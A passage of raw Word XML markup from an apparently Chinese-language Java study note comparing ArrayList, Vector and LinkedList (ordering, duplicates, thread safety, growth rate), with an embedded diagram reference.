          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>└WeakHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E657B0" w:rsidRPr="00F41A4C" w:rsidRDefault="00E657B0" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E657B0" w:rsidRPr="00F41A4C" w:rsidRDefault="00E657B0" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E657B0" w:rsidRPr="00F41A4C" w:rsidRDefault="00E657B0" w:rsidP="00E657B0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5048250" cy="4752975"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 1" descr="http://p.blog.csdn.net/images/p_blog_csdn_net/EvanLiu/map.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p.blog.csdn.net/images/p_blog_csdn_net/EvanLiu/map.bmp"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5048250" cy="4752975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E657B0" w:rsidRPr="00F41A4C" w:rsidRDefault="00E657B0" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C2CF5" w:rsidRPr="00F41A4C" w:rsidRDefault="00125C9D" w:rsidP="009C2CF5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="005970E7" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009C2CF5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidR="00F30AF9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00F30AF9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C2CF5" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidR="00F30AF9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00F30AF9" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0005254A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2CF5" w:rsidRPr="00F41A4C" w:rsidRDefault="009C2CF5" w:rsidP="009C2CF5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>相同点</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B41201" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>都</w:t>
      </w:r>
      <w:r w:rsidR="00B41201" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>该接口继承自</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2CF5" w:rsidRPr="00F41A4C" w:rsidRDefault="009C2CF5" w:rsidP="004C3D32">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="350" w:firstLine="735"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集合中元素都是有顺序的，相当动态数组，允许元素重复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2CF5" w:rsidRPr="00F41A4C" w:rsidRDefault="009C2CF5" w:rsidP="009C2CF5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C2CF5" w:rsidRPr="00F41A4C" w:rsidRDefault="009C2CF5" w:rsidP="009C2CF5">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>不同点：同步性</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2CF5" w:rsidRPr="00F41A4C" w:rsidRDefault="009C2CF5" w:rsidP="00CC0B64">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="350" w:firstLine="735"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>数据增长</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认增长为原来两倍，</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidR="00AD0787" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>增长为原来</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>倍</w:t>
      </w:r>
      <w:r w:rsidR="00CC0B64" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>这两个类都实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接口（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接口继承了</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>接口），他们都是有序集合，即存储在这两个集合中的元素的位置都是有顺序的，相当于一种动态的数组，我们以后可以按位置索引号取出某个元素，，并且其</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35527">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>中的数据是允许重复的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，这是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>之类的集合的最大不同处，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>之类的集合不可以按索引号去检索其中的元素，也不允许有重复的元素（本来题目问的与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>hashset</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有任何关系，但为了说清楚</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的功能，我们使用对比方式，更有利于说明问题）。接着才说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的区别，这主要包括两个方面：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）同步性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是线程安全的，也就是说是它的方法之间是线程同步的，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是线程序不安全的，它的方法之间是线程不同步的。如果只有一个线程会访问到集合，那最好是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，因为它不考虑线程安全，效率会高些；如果有多个线程会访问到集合，那最好是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，因为不需要我们自己再去考虑和编写线程安全的代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A10D38" w:rsidRPr="00F41A4C" w:rsidRDefault="00A10D38" w:rsidP="00A10D38">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="136" w:line="380" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="left"/>
        <w:rPr>
